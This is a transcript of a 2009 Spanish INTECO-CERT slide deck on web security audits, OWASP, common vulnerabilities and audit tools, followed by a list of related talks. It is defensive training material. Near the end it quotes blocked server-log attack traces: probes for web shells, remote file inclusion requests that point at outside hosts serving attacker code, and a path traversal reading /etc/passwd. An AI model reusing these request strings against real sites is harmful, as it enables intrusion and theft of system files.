SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira Marzo de 2009

Tamaño: px
Comenzar la demostración a partir de la página:

Download "SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009"

Transcripción

1 SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS Daniel Firvida Pereira Marzo de 2009

2 Índice Seguridad Web: Auditorías y Herramientas 0. Presentación INTECO 1. Auditorías Web 1) Introducción a la Seguridad Web 2) OWASP & WASC 3) Vulnerabilidades Web hoy en día 4) Procedimientos y técnicas de auditoria Web 2. Experiencias de INTECO-CERT 1) Experiencias de colaboración de INTECO-CERT 2

3 Índice Seguridad Web: Auditorías y Herramientas 3. Herramientas de auditoría Web 1) Aplicaciones comerciales de auditoria para Web. 2) Aplicaciones gratuitas de auditoria para Web. 3) Plataformas de aprendizaje 4. Otras fuentes de Información 1) El otro lado: trazas de un ataque Web 2) Concursos y Retos 3

4 El Instituto Nacional de Tecnologías de la Comunicación, INTECO 4

5 Actuaciones en e-confianza de INTECO 1. Qué es INTECO? Instituto Nacional de Tecnologías de la Comunicación Sociedad estatal adscrita al MITYC a través de SETSI Instrumento del Plan Avanza para el desarrollo de la S.I Pilares: Investigación aplicada, prestación de servicios y formación OBJETIVOS Convergencia de España con Europa Crear en León un "Cluster-TIC" con alta capacidad de innovación. Transversalidad tecnológica entre sectores y áreas de conocimiento TIC Alta localización de conocimiento intensivo y conexión con otros centros internacionales. 5

6 Actuaciones en e-confianza de INTECO 2. Líneas estratégicas de actuación e-confianza (Seguridad) Calidad SW Accesibilidad Centro de Respuesta a Incidentes en Tecnologías de la Información para PYMEs y Ciudadanos Centro Demostrador de Tecnologías de la Seguridad Observatorio de Seguridad de la Información Laboratorio Nacional de Calidad Formación Promoción de proyectos TIC Promoción de estándares y normalización Centro de Referencia en Accesibilidad y Estándares Web Centro Nacional de Tecnologías de la Accesibilidad Área de I+D+i en Accesibilidad Web. Centro de Gestión de servicios públicos interactivos - TDT Ciudadanía e Internet Innovación TIC y Competitividad PYME 6

7 Actuaciones en e-confianza de INTECO 3. Proyectos en e-confianza Sentar las bases de coordinación de iniciativas públicas entorno a la Seguridad Informática Coordinar la investigación aplicada y la formación especializada en el ámbito de la seguridad TIC Centro de referencia en Seguridad Informática a nivel nacional INTECO CERT Centro Demostrador de Tecnologías de la Seguridad Observatorio de la Seguridad de la información 7

8 INTECO-CERT Objetivos Impulsar la confianza en las nuevas tecnologías promoviendo su uso de forma segura y responsable Minimizar los perjuicios ocasionados por incidentes de seguridad, accidentes o fallos facilitando mecanismos de prevención y reacción adecuados Prevenir, informar, concienciar y formar a la pyme y el ciudadano proporcionando información clara y concisa acerca de la tecnología y el estado de la seguridad en Internet. 8

9 INTECO-CERT Servicios de INTECO-CERT en materia de seguridad: Servicios de Información: Suscripción a boletines y alertas Actualidad, noticias y eventos Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos por correo electrónico, información sobre correo electrónico no deseado. Servicios de Formación: guías, manuales, cursos online Servicios de Protección: útiles gratuitos y actualizaciones de software Servicios de Respuesta y Soporte: Gestión y resolución de Incidencias Gestión de Malware o código malicioso Fraude electrónico Asesoría Legal Foros 9

10 INTECO-CERT Servicios de Información: Vulnerabilidades y Malware Colaboración con NIST-NVD Traducción de más de vulnerabilidades Clasificación por nivel de severidad Aportación de vulnerabilidades descubiertas. 10

11 INTECO-CERT Servicios de Información: Virus en el correo electrónico. Red de sensores de Virus. Más de 170 sensores más de 100 millones de correos procesados al día. 0,40% de detección de correos infectados de virus informáticos en más de millones de correos analizados. Información de detecciones de malware en correo en https://ersi.inteco.es/ 11

12 INTECO-CERT Servicios de Información: SPAM. Red de sensores de SPAM. https://ersi.inteco.es/ CORREOS ELECTRÓNICOS 12

13 INTECO-CERT Servicios de Formación y Protección. Formación Guías y Manuales. Buenas prácticas. Preguntas frecuentes. Protección Descarga de útiles gratuitos de seguridad Información sobre actualizaciones de software, parches etc.. Zonas de seguridad por plataformas: Linux, Microsoft, MacOS, Dispositivos Móviles. 13

14 INTECO-CERT Servicios de Formación y Protección. Protección Avisos y alertas de seguridad, a través de boletines y web. 14

15 INTECO-CERT Servicios de Respuesta y Soporte. Gestión de incidencias o problemas de seguridad Resolución y ayuda ante incidentes de seguridad. Análisis y recomendaciones de seguridad. Sistemas de detección de malware en la red. Desarrollo de herramientas propias: CONAN. Configuration Analisys. Recoge información del PC susceptible de ser modificada por código malicioso y cualquier otra información que nos sirva para determinar si el PC está o no correctamente configurado. 15

16 INTECO-CERT Servicios de Respuesta y Soporte. Asesoría Legal Buzón de Consultas, Foros de Usuarios y Asesoría Legal de Derecho en las Nuevas Tecnologías Difusión de Guías de buenas prácticas y Manuales de concienciación y formación sobre legislación y normativas en materia de Seguridad TIC. Guías de implantación de medidas que faciliten el cumplimiento de las disposiciones legales. 16

17 INTECO-CERT Servicios de Respuesta y Soporte. Lucha contra el Fraude Información a los usuarios sobre todos los tipos de fraude electrónico a través de foros y buzón Repositorio de fraude de INTECO con información estructurada de los fraudes detectados creación de inteligencia sobre fraude electrónico en España. Colaboración con entidades financieras, FCSE, ISPs y registradores de dominios. 17

18 Centro Demostrador de Tecnologías de la Seguridad Objetivos Fomentar y difundir el uso de tecnologías de seguridad de la información Catálogo de Soluciones y Proveedores Análisis de productos de seguridad Formación a la PYME Difusión e impulso de la tecnología de seguridad Impulso del DNI electrónico y SGSI 18

19 Centro Demostrador de Tecnologías de la Seguridad Catálogo de empresas y soluciones Catalogación de todos los actores del mercado, datos de proveedor. Catalogación de los productos que ofrecen, datos de producto. Catalogación de los servicios que ofrecen, datos de servicio. Catálogo impreso 19

20 Centro Demostrador de Tecnologías de la Seguridad Catálogo online 20

21 Centro Demostrador de Tecnologías de la Seguridad Taxonomía de productos y servicios Productos (31 categorías) Servicios (14 categorías) 21

22 Centro Demostrador de Tecnologías de la Seguridad Nº DE EMPRESAS DATOS ACTUALES DEL CATÁLOGO Nº DE SOLUCIONES OFERTA ACTUAL DE PRODUCTOS Autenticación 104 Anti - Malware 64 Sistemas de seguridad de datos 45 Filtro y control de contenidos 38 OFERTA ACTUAL DE SERVICIOS Políticas de Seguridad 128 Planificación e implantación de infraestructuras 107 Cumplimiento con la legislación (LOPD,..) 102 Certificación y Acreditación 61 22

23 Centro Demostrador de Tecnologías de la Seguridad Análisis y demostración de productos y soluciones de seguridad Ámbito y alcance de la aplicación Conocer sus capacidades y características Análisis funcional y estructural Ayuda a los fabricantes Laboratorio de nuevos productos y tecnologías Generar recomendaciones 23

24 Centro Demostrador de Tecnologías de la Seguridad Difusión e impulso de la tecnología de seguridad Estudio de mercado sobre las soluciones de seguridad TIC Identificar nichos en la industria TIC española Promoción de alianzas Potenciar la tecnología de seguridad española y promover su desarrollo Acuerdos con entidades de otros países 24

25 Centro Demostrador de Tecnologías de la Seguridad Promoción de alianzas Empresas: convenios de colaboración convenios 8 convenios Asociaciones: relación con todas las patronales del sector. Actores proactivos: banca, universidades, 25

26 Centro Demostrador de Tecnologías de la Seguridad Eventos propios I ENISE II ENISE 26

27 Centro Demostrador de Tecnologías de la Seguridad Formación a la Pyme Identificación de amenazas Elaboración de contenidos Impulso cultura de seguridad Impulso del uso de tecnologías de seguridad Jornadas celebradas 25 Pymes sensibilizadas 2200 Media de asistentes 90 27

28 Programa de Impulso de los SGSI (Sistema de Gestión de Seguridad de la Información) Líneas Generales Seleccionan CATÁLOGO ORGANISMOS CERTIFICACIÓN SGSI Colabora con CÁMARAS DE COMERCIO Organizan Colabora JORNADAS Y TALLERES SGSI PYME INTECO Colabora INTECO recibe la encomienda de Gestión Seleccionan CATÁLOGO EMPRESAS IMPLANTACIÓN SGSI 28

29 Impulso DNIe: Perfiles de Protección Los Perfiles de Protección son documentos que especifican una solución de seguridad: la creación y verificación de firma electrónica con DNIe: adoptan la legislación y normativa nacional y europea definen el nivel de garantía de seguridad que ofrece una aplicación certificada que cumpla con el perfil Van a servir para desarrollar y certificar aplicaciones de firma con DNIe con garantías de seguridad: Tipo 1: para plataformas TDT, PDA s o teléfonos móviles Tipo 2: para ordenadores personales con S.O. de propósito general Los niveles de garantía de seguridad EAL1 y EAL3 indican la profundidad y rigor exigido en la evaluación de las aplicaciones que se quieran certificar. Unas Guías que facilitarán a los desarrolladores el cumplimiento con los perfiles se podrán descargar del Portal del DNIe de INTECO 29

30 Resumen de Servicios de econfianza. Servicios prestados a pymes y ciudadanos: Servicios gratuitos de Información a través del portal web, RSS o suscripción Actualidad, noticias y eventos Alertas y estadísticas en tiempo real sobre la seguridad en España Servicios gratuitos de Formación en Seguridad de la Información Manuales sobre legislación vigente Configuración de seguridad en sistemas Guías de resolución de problemas de seguridad Buenas prácticas para la prevención de problemas de seguridad Servicios gratuitos de Protección: Catálogo de útiles gratuitos de seguridad Catálogo de actualizaciones de software Servicios gratuitos de Respuesta y Soporte: Gestión y resolución de Incidencias de Seguridad Gestión y soporte ante fraude electrónico Asesoría Legal 30

31 Contactos INTECO-CERT Centro Demostrador de Tecnologías de la Seguridad 31

32 Dónde estamos Sede de INTECO Avda. Jose Aguado 41 Edificio INTECO LEÓN Tel: (+34) Fax: (+34)

33 Preguntas? 33

34 Seguridad Web 34

35 1. Auditorías Web Introducción a la seguridad Web Problemática de seguridad en las aplicaciones Web Cada vez son aplicativos mas complejos y dinámicos. Resultan fáciles comprometer o atacar. Muchas veces están accesibles desde Internet y forman parte del perímetro de seguridad de la empresa. Se trata de aplicaciones sin visión de la seguridad en su desarrollo. La seguridad en Internet no depende exclusivamente de la seguridad de la red o de los sistemas, sino también de las aplicaciones que están accesibles La seguridad de las aplicaciones Web resulta muy importante y para ello debemos auditarlas y asegurarnos de que no suponen un riesgo para la organización. 35

36 1. Auditorías Web OWASP: Open Web Application Security Project Qué es OWASP? Fundación sin animo de lucro. Creada en Independiente de los fabricantes. Formada por voluntarios. Objetivos: Promover la seguridad de las aplicaciones web. Buscar las causas de la inseguridad. Proporcionar soluciones a las amenazas. Crear herramientas, documentación y estándares. 36

37 1. Auditorías Web OWASP: Open Web Application Security Project Qué hace OWASP? Recursos para equipos de desarrollo. Foros de discusión. Aplicaciones para auditoria y para formación. Documentación y artículos. Proyectos dentro de OWASP: Webscarab: Herramienta para auditoria. WebGoat: Herramienta para formación. OWASP Testing: Metodología. Web Application Penetration Checklist: Documentación. OWASP Guide y Top Ten Project: Documentación. 37

38 1. Auditorías Web WASC: Web Application Security Consortium Qué es WASC? Participada por la industria, expertos y organizaciones. Foro abierto de participación. Objetivos: Promover estándares de seguridad web. Elaboración de artículos y guías de seguridad web. Compartir el conocimiento sobre las amenazas web. Proyectos: Application Security Scanner Evaluation Criteria. Web Hacking Incidents Database. Distributed Open Proxy Honeypots. Web Security Threat Classification. 38

39 1. Auditorías Web Vulnerabilidades Web El vector de ataque de las Vulnerabilidades Web son las Peticiones El protocolo HTTP define diversos tipos de peticiones conocidos como métodos, los comunes son los siguientes: OPTIONS: Permite listar todos los métodos permitidos por el servidor. GET: Sirve para solicitar un objeto Web, admite parámetros HEAD: Solicita la cabecera HTTP del servidor Web. POST: Sirve para solicitar un objeto Web, admite parámetros. PUT: Permite enviar un fichero al servidor Web. DELETE: Borra un objeto Web. TRACE: Tiene como finalidad propósitos de depuración. CONNECT: Permite conectar a otro servidor host (proxy, webserver,...). 39

40 1. Auditorías Web Vulnerabilidades Web Problemática: Autenticación en aplicaciones Web Autenticación anónima (sin autenticación) Autenticación a través de la propia aplicación Web Basada en formularios mediante peticiones de tipo GET / POST Autenticación basada en el protocolo HTTP HTTP Tipo Basic HTTP Tipo Digest Autenticación a través de credenciales del sistema operativo Cuentas de usuario locales o del dominio (AD, ldap,...) Seguridad en función del sistema de ficheros (NTFS,...) 40

41 1. Auditorías Web Vulnerabilidades Web Ataques a los mecanismos de autenticación en las aplicaciones Web: Captura de credenciales (sniffing o hijacking) Si las credenciales de autenticación no viajan por un canal cifrado (SSL) es posible capturar las credenciales de autenticación utilizadas. Identificación de cuentas de usuario validas Respuestas diferentes cuando el usuario introducido es incorrecto de cuando es la contraseña introducida es incorrecta Denegación de servicio a los mecanismos de autenticación A realizar n intentos de autenticación fallidos y la aplicación no esta correctamente parametrizada es posible bloquear las cuentas de usuario Ataque por Fuerza Bruta o Diccionario Si se combina la identificación de usuario con una incorrecta política de bloqueo de cuentas puede realizarse estos ataques 41

42 1. Auditorías Web Vulnerabilidades Web Problemática: Gestión de las Sesiones en las aplicaciones Web El protocolo HTTP es un protocolo sin estado, se necesitan identificadores de sesión. La gestión de sesiones es un proceso ligado con el proceso de autenticación de usuario. Se asocia al usuario un identificador de Sesión que este enviara a la aplicación Web en cada petición El identificador de sesión es generalmente una cadena de caracteres generada aleatoriamente El identificador de sesión forma parte de la cabecera HTTP, como Cookie. Aunque es posible enviarlo en peticiones de tipo GET o POST 42

43 1. Auditorías Web Vulnerabilidades Web Ataques a los mecanismos de gestión de identificadores de Sesión Ataques de interceptación de sesión Existen diferentes ataques de intercepción por ejemplo: sniffing, XSS, SQL injection, etc. Ataques por predicción del identificador Si la cadena de caracteres del identificador no es suficientemente aleatoria puede permitir su predicción Ataques por Fuerza Bruta Si el algoritmo utilizado para la generación del identificador no es suficientemente robusto, puede ser posible obtener una sesión valida por fuerza bruta Ataques de Fijación de sesión Si la aplicación no gestiona la caducidad de las sesiones o asocia siempre la misma sesión a un mismo usuario puede permitir el robo de sesiones por diversos métodos (virus, hijacking, etc) 43

44 1. Auditorías Web Vulnerabilidades Web Problemática: Validación de caracteres de entrada y salida Incorrecto control de los caracteres en variables de entrada. SQL injection Command Injection Inclusión de código script de servidor. Idap injection Include path Transversal Directory Incorrecto control de los tamaños de las variable de entrada Desbordamientos de Buffer Denegaciones de Servicio Ataques de validación de I/O: El limite es la imaginación 44

45 1. Auditorías Web Vulnerabilidades Web hoy en dia: El Top 10 de vulnerabilidades de OWASP Cross Site Scripting (XSS). Inyecciones de código. Ejecución de ficheros maliciosos. Manipulación de rutas a objetos. Cross Site Request Forgery (CSRF). Manejo inadecuado de errores. 45

46 1. Auditorías Web Vulnerabilidades Web hoy en dia: El Top 10 de vulnerabilidades de OWASP Robo de credenciales de sesión o de control de acceso. Almacenamiento de datos inseguro. Comunicaciones por un canal inseguro. Fallo en la ocultación de URLs de gestión. 46

47 1. Auditorías Web Utilización de la herramienta adecuada a cada aplicativo. Metodología de auditoria. OWASP Testing. Web Application Penetration Checklist. OSSTMM. Chequear todos los resultados de las herramientas. Uso de herramientas para localización de URLs ocultas. Conocer en lo posible la aplicación. 47

48 1. Auditorías Web Documentarse sobre las vulnerabilidades existentes. Uso de distintos patrones de los ataques XSS (Cross Site Scripting) Cheat Sheet - XSSDB attack database - Captura de evidencias. No realizar denegaciones de Servicio. Uso de herramientas de aprendizaje como WebGoat o participación en concursos de hacking 48

49 1. Auditorías Web Es importante no menospreciar las fugas de información en las respuestas del servidor Es necesario validar todos los caracteres de entrada en las variables de peticiones GET y POST Hay que generar identificadores de sesión complejos, con aleatoriedad, enviarlos a través de las Cookies y con caducidad Utilización de contraseñas fuertes. Validar el identificador de sesión en todas las páginas. No almacenar las contraseñas en claro en la Base de Datos. No utilizar variables ocultas que no deseen ser vistas o modificadas por el usuario. 49

50 2. Experiencias de INTECO-CERT Gestión de incidencias o problemas de seguridad Resolución y ayuda ante incidentes de seguridad. Análisis y recomendaciones de seguridad. Sistemas de detección de malware en la red. Ministerio de Vivienda: A partir de un incidente de seguridad en la pagina web se realizo un análisis exhaustivo de la seguridad de la misma. Foro Internacional de Contenidos Digitales: Revisión de seguridad de la Web del Foro Internacional de Contenidos Digitales (FICOD 2008) del Ministerio de Industria. 50

51 2. Experiencias de INTECO-CERT Vulnerabilidades más encontradas Vulnerabilidades de SQL injection. Con obtención de usuarios y contraseñas. Incorrecto manejo de sesiones. Posibilidad de saltarse la autenticación y obtener una sesión privilegiada en la aplicación. Incorrecta configuración del servidor. Listado de directorios. Obtención de información sensible del servidor. Acceso a ficheros de logs. Versiones no actualizadas o con vulnerabilidades. Versiones de PHP, del gestor de contenidos, etc. 51

52 3. Herramientas de auditoría Web Aplicaciones comerciales Características comunes Propósito múltiple (no exclusivas por vulnerabilidad). Capacidad de auditoria ante cualquier tipo de aplicativo. Incorporan utilidades para pruebas manuales. Aspectos Configurables. Proporcionan abundante documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Un elevado precio. 52

53 3. Herramientas de auditoría Web Acunetix Web Vulnerability Scanner 53

54 3. Herramientas de auditoría Web IBM Rational AppScan 54

55 3. Herramientas de auditoría Web HP WebInspect 55

56 3. Herramientas de auditoría Web Aplicaciones gratuitas Características comunes La mayoría son para un propósito especifico. Tienen limitaciones para algún tipo de aplicativo. Incorporan utilidades para pruebas manuales. Mayor capacidad de configuración. Proporcionan menos documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Son gratis. 56

57 3. Herramientas de auditoría Web WebScarab 57

58 3. Herramientas de auditoría Web Paros 58

59 3. Herramientas de auditoría Web w3af 59

60 3. Herramientas de auditoría Web Plataformas de aprendizaje: WEBGOAT 60

61 3. Herramientas de auditoría Web Plataformas de aprendizaje: WEBGOAT Video Soluciones 61

62 3. Herramientas de auditoría Web Plataformas de aprendizaje: HACKME FOUNDSTONE 62

63 4. Otras fuentes de Información Búsqueda de un objetivo para un ataque GET /horde-3.0.6//readme HTTP/1.1 GET /horde-3.0.7//readme HTTP/1.1 GET /horde-3.0.8//readme HTTP/1.1 GET / //readme HTTP/1.1 GET /webmail//readme HTTP/1.1 GET /mailz//readme HTTP/1.1 GET /horde2//readme HTTP/1.1 GET //scgi/awstats/awstats.pl HTTP/1.1 GET //scripts/awstats.pl HTTP/1.1 GET //cgi-bin/awstats/awstats.pl HTTP/1.1 GET //cgi-bin/stats/awstats.pl HTTP/1.1 GET //scgi-bin/stats/awstats.pl HTTP/1.1 CONNECT :8080 HTTP/1.0 OPTIONS * HTTP/1.0 63

64 4. Otras fuentes de Información Búsqueda de un objetivo para un ataque GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin0/tbl_select.php HTTP/1.1 GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1 GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin2/read_dump.php HTTP/1.0 GET /phpmyadmin-2.2.3/read_dump.php HTTP/1.0 GET /phpmyadmin/r57.php HTTP/1.1 GET /phpmyadmin/c99.php HTTP/1.1 GET /phpmyadmin/shell.php HTTP/1.1 GET /phpmyadmin/cmd.php HTTP/1.1 GET /w00tw00t.at.isc.sans.mslog:) HTTP/1.1 GET /w00tw00t.at.isc.sans.pwn!t:) HTTP/1.1 GET /w00tw00t.at.isc.sans.dfind:) HTTP/1.1 64

65 4. Otras fuentes de Información Trazas de un intento de ataque /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thera nchjohnstown.com/menu/r7?? HTTP/1.1 /en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a ltervista.org/a.txt?? HTTP/1.1 /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter vista.org/a.txt?? HTTP/1.1 /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft p.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%ff%ff%ff%ff%ff /1? HTTP/1.1 //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:// /upload/ p/old? HTTP/1.1 /_vti_bin/owssvr.dll?ul=1&act=4&build=6254&strmver=4&capreq=0 HTTP/1.1 65

66 4. Otras fuentes de Información Trazas de un intento de ataque GET /includes/ordersuccess.inc.php?&glob=1&cart_order_id=1&glob[rootdir]=http:// /joomla/1.gif?/ HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: Close Host: X User-Agent: Morfeus Fucking Scanner mod_security-action: 406 HTTP/ Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso

67 4. Otras fuentes de Información Trazas de un intento de ataque GET /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/ /ftp.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%ff%ff%ff%ff%f F/1? HTTP/1.1 Connection: TE, close Host: TE: deflate,gzip;q=0.3 User-Agent: libwww-perl/5.808 mod_security-action: 406 HTTP/ Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso

68 4. Otras fuentes de Información Trazas de un intento de ataque GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0 Connection: Keep-Alive Content-Length: 0 Host: User-Agent: Mozilla/4.75 (Nikto/1.35 ) mod_security-action: 406 HTTP/ Not Acceptable Connection: close Content-Type: text/html; charset=iso

69 4. Otras fuentes de Información CONCURSOS Y RETOS Retos Hacking (I IX) Concurso BSGAME #1 SecGame SG6Labs 69

70 Preguntas? 70

71 Muchas gracias 71

72

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

Iniciativas públicas en torno a la seguridad informática. Instituto Nacional de Tecnologías de la Comunicación

Iniciativas públicas en torno a la seguridad informática. Instituto Nacional de Tecnologías de la Comunicación Iniciativas públicas en torno a la seguridad informática Instituto Nacional de Tecnologías de la Comunicación Índice 1. Qué es INTECO? 2. Líneas estratégicas de actuación I. Motivación de INTECO-CERT 3.

Más detalles

Fraude y riesgos informáticos en España

Fraude y riesgos informáticos en España Fraude y riesgos informáticos en España Cátedra Gestión de Riesgos en Sistemas de Información. Instituto de Empresa, GMV, Oracle, INTECO. Elena García Díez 4 Junio 2008 Índice 1. Qué es INTECO? 2. Líneas

Más detalles

Día 1, Taller hacia un correo limpio y seguro

Día 1, Taller hacia un correo limpio y seguro Día 1, Taller hacia un correo limpio y seguro Juan Díez González Técnico de seguridad - INTECO-CERT 21 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD Índice 1. Qué es INTECO? 2. Líneas

Más detalles

INTECO CERT. Centro de Respuesta a Incidentes en TI para PYMEs y Ciudadanos. XXIII Grupos de Trabajo RedIRIS. Francisco A. Lago García 26 VI 2007

INTECO CERT. Centro de Respuesta a Incidentes en TI para PYMEs y Ciudadanos. XXIII Grupos de Trabajo RedIRIS. Francisco A. Lago García 26 VI 2007 INTECO CERT Centro de Respuesta a Incidentes en TI para PYMEs y Ciudadanos XXIII Grupos de Trabajo RedIRIS Francisco A. Lago García 26 VI 2007 Contenidos Qué es INTECO Por qué un CERT para PYMEs y Ciudadanos

Más detalles

Seguridad en la Red: recomendaciones y recursos para la seguridad

Seguridad en la Red: recomendaciones y recursos para la seguridad Seguridad en la Red: recomendaciones y recursos para la seguridad IV Semana de Seguridad Informática Fundación Dédalo Tudela, 24 de Marzo de 2010 Héctor R. Suárez (INTECO) hectorrene.suarez@inteco.es OBSERVATORIO

Más detalles

Seguridad de la Información: un reto para la empresa Seguridad TIC para la PYME

Seguridad de la Información: un reto para la empresa Seguridad TIC para la PYME Seguridad de la Información: un reto para la empresa Seguridad TIC para la PYME INTECO CERT Área de e Confianza de INTECO Índice de la Jornada 1. El Instituto Nacional de las Tecnologías de la Comunicación,

Más detalles

XV Jornadas de Investigación en las Universidades Españolas. Las Palmas de Gran Canaria, 21 de noviembre 2007

XV Jornadas de Investigación en las Universidades Españolas. Las Palmas de Gran Canaria, 21 de noviembre 2007 INTECO. Presentación corporativa XV Jornadas de Investigación en las Universidades Españolas Las Palmas de Gran Canaria, 21 de noviembre 2007 Indice 1. QUÉ ES EL PLAN AVANZA? 2. QUÉ ES EL INTECO? 3. LINEAS

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Offensive State Auditoría de Aplicaciones Web

Offensive State Auditoría de Aplicaciones Web Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

OWASP: Un punto de vista. aplicaciones web seguras

OWASP: Un punto de vista. aplicaciones web seguras OWASP: Un punto de vista pragmático para el desarrollo de aplicaciones web seguras Armando Carvajal (armando.carvajal@globalteksecurity.com) Gerente Arquitecto Soluciones Globaltek Security Master en seguridad

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Técnicas y Procedimientos para la realización de Test de Intrusión

Técnicas y Procedimientos para la realización de Test de Intrusión Extrelan 2008 Cáceres. Marzo de 2008 Técnicas y Procedimientos para la realización de Test de Intrusión SG6 Soluciones Globales en Seguridad de la Información http://www.sg6.es INDICE DE CONTENIDOS Primera

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Gastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia

Gastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Gastón Toth gaston.toth@owasp.org Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing

Más detalles

Testing de Seguridad de Aplicaciones Web

Testing de Seguridad de Aplicaciones Web Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. jardita@cybsec.com 16 de Noviembre de 2013 Coatzacoalcos - MEXICO Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades

Más detalles

Seguridad TIC en la PYME Semana sobre Seguridad Informática

Seguridad TIC en la PYME Semana sobre Seguridad Informática Seguridad TIC en la PYME Semana sobre Seguridad Informática Iñigo Tomé Bermejo Centro Demostrador de Seguridad para la PYME Versión 0.e Índice de la Jornada Parte 1 1. La PYME y el reto de la seguridad

Más detalles

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema

Más detalles

Servicio de Protección Total Web

Servicio de Protección Total Web Servicio de Protección Total Web Prevención de Fraude Inspecciones de Procesos, Tecnología, Personas y Lugares, Ethical hacking, Concientización y Capacitación en Seguridad Detección de Fraude Ambientes

Más detalles

